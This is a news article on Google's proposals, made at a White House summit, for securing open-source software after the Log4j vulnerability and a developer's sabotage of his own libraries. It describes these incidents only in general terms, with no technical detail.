Google says that it wants to increase government collaboration to help secure open-source after participating in a White House summit.
On Thursday, Google participated in the White House Open Source Software Security Summit with the aim of building on its “work with the Administration to strengthen America’s collective cybersecurity through critical areas like open-source software.”
The past year has been particularly bad for open-source security problems, with several even making national headlines. This year hasn’t begun much better.
Open-source is broken
While it was technically uncovered in December, the fallout from the Log4j vulnerability has continued into the new year. A vulnerability with the open-source logging library – commonly used by apps and services across the internet – enables attackers to break into systems, steal passwords and logins, extract data, and infect networks with malicious software.
Kent Walker, President of Global Affairs & Chief Legal Officer at Google & Alphabet, wrote in a blog post:
“Industries and governments have been making strides to tackle the frequent security issues that plague legacy, proprietary software.
The recent log4j open-source software vulnerability shows that we need the same attention and commitment to safeguarding open-source tools, which are just as critical.”
The Log4j vulnerability appears to have been entirely accidental and has since been patched, although many apps and services are yet to implement it. However, some open-source issues are introduced on purpose.
Just earlier this week, Developer reported on an open-source developer that corrupted two of his popular libraries to indefinitely print gibberish messages to the consoles of users of apps making use of the libraries—rendering them useless. Then, of course, there was that whole SolarWinds fiasco last year.
Open-source is key to modern software development. The benefits are numerous: helping to speed up releases, avoid vendor lock-in, lower costs, increase transparency, and many projects have a great community spirit (many also don’t, but we’ll stick to the positives!)
According to Synopsys’ 2021 Open Source Security and Risk Analysis (OSSRA) report, 98 percent of the audited codebases contained at least one open-source component and 75 percent of all codebases were composed of open-source.
However, 84 percent of codebases were found to have at least one vulnerability; with an average of 158 per codebase. The average vulnerability found was 2.2 years old.
“Because it is freely available, open-source facilitates collaborative innovation and the development of new technologies to help solve shared problems. That’s why many aspects of critical infrastructure and national security systems incorporate it.
But there’s no official resource allocation and few formal requirements or standards for maintaining the security of that critical code. In fact, most of the work to maintain and enhance the security of open-source, including fixing known vulnerabilities, is done on an ad-hoc, volunteer basis.”
The lack of payment for his work is one reason the aforementioned open-source developer corrupted his own libraries.
“Respectfully, I am no longer going to support Fortune 500s (and other smaller sized companies) with my free work,” he wrote in a post on his project’s GitHub. “Take this as an opportunity to send me a six-figure yearly contract or fork the project and have someone else work on it.”
The issue split the software development community. Some were sympathetic – after all, everyone has to put food on the table – while others were less so:
Google has contributed financial resources to groups and individuals working on open-source for their critical work. Last year, Google committed $10 billion over the next five years to “advance cybersecurity” by fixing some of the key problems with open-source and offering more training.
As part of that commitment, Google allocated $100 million to support independent organisations – including the Open Source Security Foundation (OpenSSF) – that do the noble work of helping to fix open-source vulnerabilities.
Three proposals to fix open-source
During this week’s summit, Google shared three proposals to improve how open-source is maintained and secured.
The first proposal is establishing a public-private partnership to identify critical projects. Google believes will help with the prioritisation and allocation of resources to where it’s most likely to have the greatest positive impact.
Next up is establishing security, maintenance, and testing baselines.
Google already has some form in this area by establishing SLSA, an end-to-end framework to ensure supply chain integrity. The framework is supported by OpenSSF, an organisation that is already working to create further cross-industry standards.
The final proposal is to increase public and private support.
“In the discussion today, we proposed setting up an organisation to serve as a marketplace for open-source maintenance, matching volunteers from companies with the critical projects that most need support,” explains Walker.
“Google stands ready to contribute resources to this effort.”
Actions speak louder than words, and, so far, Google’s actions have been loud by contributing talent and significant financial resources towards fixing open-source.
Greater collaboration across the private and public sectors on open-source can only be a good thing. Google’s proposals look to lay a solid foundation of how that could look in practice.
(Image Credit: Google)
Looking to revamp your digital transformation strategy? Learn more about Digital Transformation Week taking place on 11-12 May 2022 and discover key strategies for making your digital efforts a success.
Explore other upcoming enterprise technology events and webinars powered by TechForge here.